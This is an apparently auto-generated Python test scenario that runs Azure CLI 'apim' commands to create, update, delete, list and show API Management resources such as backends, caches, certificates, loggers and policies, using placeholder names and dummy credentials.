self.cmd('apim authorization-server update --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --description "test server" --token-endpoint "https://www.contoso.com/oauth2/token" --support-state true --default-scope "read write" --client-secret "2" --resource-owner-username "un" --resource-owner-password "pwd" --display-name "test2" --client-registration-endpoint "https://www.contoso.com/apps" --authorization-endpoint "https://www.contoso.com/oauth2/auth" --client-id "1"', checks=[
])
self.cmd('apim authorization-server update --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer" --client-secret "updated" --client-id "update"', checks=[
])
self.cmd('apim authorization-server update --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# delete -- delete
self.cmd('apim authorization-server delete --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server delete --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server delete --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# list_by_service -- list
self.cmd('apim authorization-server list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim authorization-server list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim authorization-server list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim authorization-server show --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server show --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer"', checks=[
])
self.cmd('apim authorization-server show --resource-group "rg1" --service-name "apimService1" --authsid "newauthServer2"', checks=[
])
# create_or_update -- create
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend" --description "Service Fabric Test App 1" --url "fabric:/mytestapp/mytestservice" --protocol "http"', checks=[
])
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308" --url "https://backendname2644/" --protocol "http"', checks=[
])
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308"', checks=[
])
self.cmd('apim backend create --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# create_or_update -- update
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend" --description "Service Fabric Test App 1" --url "fabric:/mytestapp/mytestservice" --protocol "http"', checks=[
])
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308" --url "https://backendname2644/" --protocol "http"', checks=[
])
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend" --description "description5308"', checks=[
])
self.cmd('apim backend update --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# delete -- delete
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
self.cmd('apim backend delete --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# list_by_service -- list
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim backend list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "proxybackend"', checks=[
])
self.cmd('apim backend show --resource-group "rg1" --service-name "apimService1" --backend-id "sfbackend"', checks=[
])
# create_or_update -- create
self.cmd('apim cache create --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Redis cache instances in West India" --connection-string "contoso5.redis.cache.windows.net,ssl=true,password=..." --resource-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Cache/Redis/{{ redis_name }}"', checks=[
])
self.cmd('apim cache create --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Update Cache in west India"', checks=[
])
self.cmd('apim cache create --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
# create_or_update -- update
self.cmd('apim cache update --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Redis cache instances in West India" --connection-string "contoso5.redis.cache.windows.net,ssl=true,password=..." --resource-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.Cache/Redis/{{ redis_name }}"', checks=[
])
self.cmd('apim cache update --resource-group "rg1" --service-name "apimService1" --cache-id "westindia" --description "Update Cache in west India"', checks=[
])
self.cmd('apim cache update --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
# delete -- delete
self.cmd('apim cache delete --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache delete --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache delete --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
# list_by_service -- list
self.cmd('apim cache list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim cache list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim cache list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim cache show --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache show --resource-group "rg1" --service-name "apimService1" --cache-id "westindia"', checks=[
])
self.cmd('apim cache show --resource-group "rg1" --service-name "apimService1" --cache-id "southindia"', checks=[
])
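# The certificate examples use placeholder text for --data and --password; a real
# run would need the base64-encoded PFX contents and its password, e.g.
# (hypothetical helper, not part of this module):
#
#   import base64
#   cert_data = base64.b64encode(open('cert.pfx', 'rb').read()).decode()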
# create_or_update -- create
self.cmd('apim certificate create --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert" --data "****************Base 64 Encoded Certificate *******************************" --password "****Certificate Password******"', checks=[
])
self.cmd('apim certificate create --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
# create_or_update -- update
self.cmd('apim certificate update --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert" --data "****************Base 64 Encoded Certificate *******************************" --password "****Certificate Password******"', checks=[
])
self.cmd('apim certificate update --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
# delete -- delete
self.cmd('apim certificate delete --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
self.cmd('apim certificate delete --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
# list_by_service -- list
self.cmd('apim certificate list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim certificate list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim certificate show --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
self.cmd('apim certificate show --resource-group "rg1" --service-name "apimService1" --certificate-id "tempcert"', checks=[
])
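# Service-level operations: `apim create` provisions the API Management instance
# itself. This is a long-running operation (typically tens of minutes for the
# Developer, Basic and Premium SKUs), so live runs of this block are slow; the
# Consumption SKU example below usually activates much faster.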
# create_or_update -- create
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Developer" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --virtual-network-type "External" --publisher-email "admin@live.com" --publisher-name "contoso" --sku-name "Premium" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Consumption" --location "West US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Basic" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1" --publisher-email "foobar@live.com" --publisher-name "Contoso Vnext"', checks=[
])
self.cmd('apim create --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- update
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Developer" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --virtual-network-type "External" --publisher-email "admin@live.com" --publisher-name "contoso" --sku-name "Premium" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Consumption" --location "West US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "apim@autorestsdk.com" --publisher-name "autorestsdk" --sku-name "Basic" --sku-capacity "1" --location "Central US"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1" --publisher-email "foobar@live.com" --publisher-name "Contoso Vnext"', checks=[
])
self.cmd('apim update --resource-group "rg1" --name "apimService1"', checks=[
])
# delete -- delete
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim delete --resource-group "rg1" --name "apimService1"', checks=[
])
# list_by_resource_group -- list
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
# list -- list
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
self.cmd('apim list --resource-group "rg1"', checks=[
])
# get -- show
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
self.cmd('apim show --resource-group "rg1" --name "apimService1"', checks=[
])
# create_or_update -- create
self.cmd('apim diagnostic create --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/azuremonitor"', checks=[
])
self.cmd('apim diagnostic create --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim diagnostic create --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# create_or_update -- update
self.cmd('apim diagnostic update --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/azuremonitor"', checks=[
])
self.cmd('apim diagnostic update --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights" --always-log "allErrors" --logger-id "/loggers/applicationinsights"', checks=[
])
self.cmd('apim diagnostic update --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# delete -- delete
self.cmd('apim diagnostic delete --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic delete --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic delete --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# list_by_service -- list
self.cmd('apim diagnostic list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim diagnostic list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim diagnostic list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim diagnostic show --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic show --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
self.cmd('apim diagnostic show --resource-group "rg1" --service-name "apimService1" --diagnostic-id "applicationinsights"', checks=[
])
# create_or_update -- create
self.cmd('apim template create --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage" --subject "Your request for $IssueName was successfully received."', checks=[
])
self.cmd('apim template create --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage" --subject "Your application $AppName is published in the gallery" --body "<!DOCTYPE html >\r\n<html>\r\n <head />\r\n <body>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Dear $DevFirstName $DevLastName,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">\r\n We are happy to let you know that your request to publish the $AppName application in the gallery has been approved. Your application has been published and can be viewed <a href=\"http://$DevPortalUrl/Applications/Details/$AppId\">here</a>.\r\n </p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Best,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">The $OrganizationName API Team</p>\r\n </body>\r\n</html>"', checks=[
])
self.cmd('apim template create --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# create_or_update -- update
self.cmd('apim template update --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage" --subject "Your request for $IssueName was successfully received."', checks=[
])
self.cmd('apim template update --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage" --subject "Your application $AppName is published in the gallery" --body "<!DOCTYPE html >\r\n<html>\r\n <head />\r\n <body>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Dear $DevFirstName $DevLastName,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">\r\n We are happy to let you know that your request to publish the $AppName application in the gallery has been approved. Your application has been published and can be viewed <a href=\"http://$DevPortalUrl/Applications/Details/$AppId\">here</a>.\r\n </p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">Best,</p>\r\n <p style=\"font-size:12pt;font-family:'Segoe UI'\">The $OrganizationName API Team</p>\r\n </body>\r\n</html>"', checks=[
])
self.cmd('apim template update --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# delete -- delete
self.cmd('apim template delete --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
self.cmd('apim template delete --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage"', checks=[
])
self.cmd('apim template delete --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# list_by_service -- list
self.cmd('apim template list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim template list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim template list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim template show --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
self.cmd('apim template show --resource-group "rg1" --service-name "apimService1" --name "applicationApprovedNotificationMessage"', checks=[
])
self.cmd('apim template show --resource-group "rg1" --service-name "apimService1" --name "newIssueNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup" --display-name "NewGroup (samiraad.onmicrosoft.com)" --description "new group to test" --type "external" --external-id "aad://samiraad.onmicrosoft.com/groups/83cf2753-5831-4675-bc0e-2f8dc067c58d"', checks=[
])
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group create --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# create_or_update -- update
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup" --display-name "NewGroup (samiraad.onmicrosoft.com)" --description "new group to test" --type "external" --external-id "aad://samiraad.onmicrosoft.com/groups/83cf2753-5831-4675-bc0e-2f8dc067c58d"', checks=[
])
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --display-name "temp group"', checks=[
])
self.cmd('apim group update --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# delete -- delete
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group delete --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# list_by_service -- list
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim group list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group show --resource-group "rg1" --service-name "apimService1" --group-id "aadGroup"', checks=[
])
# create -- create
self.cmd('apim group user create --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --user-id "59307d350af58404d8a26300"', checks=[
])
self.cmd('apim group user create --resource-group "rg1" --service-name "apimService1" --group-id "templategroup" --user-id "59307d350af58404d8a26300"', checks=[
])
# delete -- delete
self.cmd('apim group user delete --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup" --user-id "59307d350af58404d8a26300"', checks=[
])
self.cmd('apim group user delete --resource-group "rg1" --service-name "apimService1" --group-id "templategroup" --user-id "59307d350af58404d8a26300"', checks=[
])
# list -- list
self.cmd('apim group user list --resource-group "rg1" --service-name "apimService1" --group-id "tempgroup"', checks=[
])
self.cmd('apim group user list --resource-group "rg1" --service-name "apimService1" --group-id "templategroup"', checks=[
])
# create_or_update -- create
self.cmd('apim identity-provider create --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "facebookid" --client-secret "facebookapplicationsecret"', checks=[
])
self.cmd('apim identity-provider create --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "updatedfacebookid" --client-secret "updatedfacebooksecret"', checks=[
])
self.cmd('apim identity-provider create --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# create_or_update -- update
self.cmd('apim identity-provider update --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "facebookid" --client-secret "facebookapplicationsecret"', checks=[
])
self.cmd('apim identity-provider update --resource-group "rg1" --service-name "apimService1" --name "facebook" --client-id "updatedfacebookid" --client-secret "updatedfacebooksecret"', checks=[
])
self.cmd('apim identity-provider update --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# delete -- delete
self.cmd('apim identity-provider delete --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider delete --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider delete --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# list_by_service -- list
self.cmd('apim identity-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim identity-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim identity-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim identity-provider show --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider show --resource-group "rg1" --service-name "apimService1" --name "facebook"', checks=[
])
self.cmd('apim identity-provider show --resource-group "rg1" --service-name "apimService1" --name "aad"', checks=[
])
# create_or_update -- create
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "azureEventHub" --description "adding a new logger"', checks=[
])
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "applicationInsights" --description "adding a new logger"', checks=[
])
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger create --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# create_or_update -- update
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "azureEventHub" --description "adding a new logger"', checks=[
])
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId" --logger-type "applicationInsights" --description "adding a new logger"', checks=[
])
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger update --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# delete -- delete
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger delete --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# list_by_service -- list
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim logger list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
self.cmd('apim logger show --resource-group "rg1" --service-name "apimService1" --logger-id "loggerId"', checks=[
])
# create_or_update -- create
self.cmd('apim notification create --resource-group "rg1" --service-name "apimService1" --name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- update
self.cmd('apim notification update --resource-group "rg1" --service-name "apimService1" --name "RequestPublisherNotificationMessage"', checks=[
])
# list_by_service -- list
self.cmd('apim notification list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim notification show --resource-group "rg1" --service-name "apimService1" --name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim notification recipient-user create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
self.cmd('apim notification recipient-user create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
# create_or_update -- update
self.cmd('apim notification recipient-user update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
self.cmd('apim notification recipient-user update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
# delete -- delete
self.cmd('apim notification recipient-user delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
self.cmd('apim notification recipient-user delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --user-id "576823d0a40f7e74ec07d642"', checks=[
])
# list_by_notification -- list
self.cmd('apim notification recipient-user list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
self.cmd('apim notification recipient-user list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim notification recipient-email create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "foobar@live.com"', checks=[
])
self.cmd('apim notification recipient-email create --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "contoso@live.com"', checks=[
])
# create_or_update -- update
self.cmd('apim notification recipient-email update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "foobar@live.com"', checks=[
])
self.cmd('apim notification recipient-email update --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "contoso@live.com"', checks=[
])
# delete -- delete
self.cmd('apim notification recipient-email delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "foobar@live.com"', checks=[
])
self.cmd('apim notification recipient-email delete --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage" --email "contoso@live.com"', checks=[
])
# list_by_notification -- list
self.cmd('apim notification recipient-email list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
self.cmd('apim notification recipient-email list --resource-group "rg1" --service-name "apimService1" --notification-name "RequestPublisherNotificationMessage"', checks=[
])
# create_or_update -- create
self.cmd('apim openid-connect-provider create --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3" --display-name "templateoidprovider3" --metadata-endpoint "https://oidprovider-template3.net" --client-id "oidprovidertemplate3"', checks=[
])
self.cmd('apim openid-connect-provider create --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2" --client-secret "updatedsecret"', checks=[
])
self.cmd('apim openid-connect-provider create --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# create_or_update -- update
self.cmd('apim openid-connect-provider update --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3" --display-name "templateoidprovider3" --metadata-endpoint "https://oidprovider-template3.net" --client-id "oidprovidertemplate3"', checks=[
])
self.cmd('apim openid-connect-provider update --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2" --client-secret "updatedsecret"', checks=[
])
self.cmd('apim openid-connect-provider update --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# delete -- delete
self.cmd('apim openid-connect-provider delete --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
self.cmd('apim openid-connect-provider delete --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2"', checks=[
])
self.cmd('apim openid-connect-provider delete --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# list_by_service -- list
self.cmd('apim openid-connect-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim openid-connect-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim openid-connect-provider list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim openid-connect-provider show --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
self.cmd('apim openid-connect-provider show --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect2"', checks=[
])
self.cmd('apim openid-connect-provider show --resource-group "rg1" --service-name "apimService1" --opid "templateOpenIdConnect3"', checks=[
])
# create_or_update -- create
self.cmd('apim policy create --resource-group "rg1" --service-name "apimService1" --policy-id "policy" --value "<policies>\r\n <inbound />\r\n <backend>\r\n <forward-request />\r\n </backend>\r\n <outbound />\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim policy create --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# create_or_update -- update
self.cmd('apim policy update --resource-group "rg1" --service-name "apimService1" --policy-id "policy" --value "<policies>\r\n <inbound />\r\n <backend>\r\n <forward-request />\r\n </backend>\r\n <outbound />\r\n</policies>" --format "xml"', checks=[
])
self.cmd('apim policy update --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# delete -- delete
self.cmd('apim policy delete --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
self.cmd('apim policy delete --resource-group "rg1" --service-name "apimService1" --policy-id "policy"', checks=[
])
# list_by_service -- list
self.cmd('apim policy list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim policy list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim policy show --resource-group "rg1" --service-name "apimService1" --policy-id "policy" --format "xml"', checks=[
])
